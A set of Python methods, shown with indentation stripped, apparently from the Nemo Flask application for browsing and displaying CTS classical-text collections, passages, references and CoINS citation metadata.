text = self.get_collection(objectId)
reffs = self.chunk(
text,
lambda level: self.resolver.getReffs(objectId, level=level, subreference=subreference)
)
if export_collection is True:
return text, reffs
return reffs |
def get_passage(self, objectId, subreference):
""" Retrieve the passage identified by the parameters
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference of the passage
:type subreference: str
:return: An object bearing metadata and its text
:rtype: InteractiveTextualNode
"""
passage = self.resolver.getTextualNode(
textId=objectId,
subreference=subreference,
metadata=True
)
return passage |
def get_siblings(self, objectId, subreference, passage):
""" Get siblings of a browsed subreference
.. note:: Since 1.0.0c, there is no more prevnext dict. Nemo uses the list of original\
chunked references to retrieve next and previous, or simply relies on the resolver to get siblings\
when the subreference is not found in given original chunks.
:param objectId: Id of the object
:param subreference: Subreference of the object
:param passage: Current Passage
:return: Previous and next references
:rtype: (str, str)
"""
reffs = [reff for reff, _ in self.get_reffs(objectId)]
if subreference in reffs:
index = reffs.index(subreference)
# Not the first item and not the last one
if 0 < index < len(reffs) - 1:
return reffs[index-1], reffs[index+1]
elif index == 0 and index < len(reffs) - 1:
return None, reffs[1]
elif index > 0 and index == len(reffs) - 1:
return reffs[index-1], None
else:
return None, None
else:
return passage.siblingsId |
def semantic(self, collection, parent=None):
""" Generates a SEO friendly string for given collection
:param collection: Collection object to generate string for
:param parent: Current collection parent
:return: SEO/URL Friendly string
"""
if parent is not None:
collections = parent.parents[::-1] + [parent, collection]
else:
collections = collection.parents[::-1] + [collection]
return filters.slugify("--".join([item.get_label() for item in collections if item.get_label()])) |
def make_coins(self, collection, text, subreference="", lang=None):
""" Creates a CoINS Title string from information
:param collection: Collection to create coins from
:param text: Text/Passage object
:param subreference: Subreference
:param lang: Locale information
:return: Coins HTML title value
"""
if lang is None:
lang = self.__default_lang__
return "url_ver=Z39.88-2004"\
"&ctx_ver=Z39.88-2004"\
"&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook"\
"&rft_id={cid}"\
"&rft.genre=bookitem"\
"&rft.btitle={title}"\
"&rft.edition={edition}"\
"&rft.au={author}"\
"&rft.atitle={pages}"\
"&rft.language={language}"\
"&rft.pages={pages}".format(
title=quote(str(text.get_title(lang))), author=quote(str(text.get_creator(lang))),
cid=url_for(".r_collection", objectId=collection.id, _external=True),
language=collection.lang, pages=quote(subreference), edition=quote(str(text.get_description(lang)))
) |
def expose_ancestors_or_children(self, member, collection, lang=None):
""" Build an ancestor or descendant dict view based on selected information
:param member: Current Member to build for
:param collection: Collection from which we retrieved it
:param lang: Language to express data in
:return:
"""
x = {
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size,
"semantic": self.semantic(member, parent=collection)
}
if isinstance(member, ResourceCollection):
x["lang"] = str(member.lang)
return x |
def make_members(self, collection, lang=None):
""" Build member list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
objects = sorted([
self.expose_ancestors_or_children(member, collection, lang=lang)
for member in collection.members
if member.get_label()
],
key=itemgetter("label")
)
return objects |
def make_parents(self, collection, lang=None):
""" Build parents list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
return [
{
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size
}
for member in collection.parents
if member.get_label()
] |
def r_collections(self, lang=None):
""" Retrieve the top collections of the inventory
:param lang: Lang in which to express main data
:type lang: str
:return: Collections information and template
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata()
return {
"template": "main::collection.html",
"current_label": collection.get_label(lang),
"collections": {
"members": self.make_members(collection, lang=lang)
}
} |
def r_collection(self, objectId, lang=None):
""" Collection content browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and collections contained in given collection
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata(objectId)
return {
"template": "main::collection.html",
"collections": {
"current": {
"label": str(collection.get_label(lang)),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"members": self.make_members(collection, lang=lang),
"parents": self.make_parents(collection, lang=lang)
},
} |
def r_references(self, objectId, lang=None):
""" Text exemplar references browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and required information about text with its references
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
return {
"template": "main::references.html",
"objectId": objectId,
"citation": collection.citation,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"parents": self.make_parents(collection, lang=lang)
},
"reffs": reffs
} |
def r_first_passage(self, objectId):
""" Provides a redirect to the first passage of given objectId
:param objectId: Collection identifier
:type objectId: str
:return: Redirection to the first passage of given text
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
first, _ = reffs[0]
return redirect(
url_for(".r_passage_semantic", objectId=objectId, subreference=first, semantic=self.semantic(collection))
) |
def r_passage(self, objectId, subreference, lang=None):
""" Retrieve the text of the passage
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:param subreference: Reference identifier
:type subreference: str
:return: Template, collections metadata and Markup object representing the text
:rtype: {str: Any}
"""
collection = self.get_collection(objectId)
if isinstance(collection, CtsWorkMetadata):
editions = [t for t in collection.children.values() if isinstance(t, CtsEditionMetadata)]
if len(editions) == 0:
raise UnknownCollection("This work has no default edition")
return redirect(url_for(".r_passage", objectId=str(editions[0].id), subreference=subreference))
text = self.get_passage(objectId=objectId, subreference=subreference)
passage = self.transform(text, text.export(Mimetypes.PYTHON.ETREE), objectId)
prev, next = self.get_siblings(objectId, subreference, text)
return {
"template": "main::text.html",
"objectId": objectId,
"subreference": subreference,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
"author": text.get_creator(lang),
"title": text.get_title(lang),
"description": text.get_description(lang),
"citation": collection.citation,
"coins": self.make_coins(collection, text, subreference, lang=lang)
},
"parents": self.make_parents(collection, lang=lang)
},
"text_passage": Markup(passage),
"prev": prev,
"next": next
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.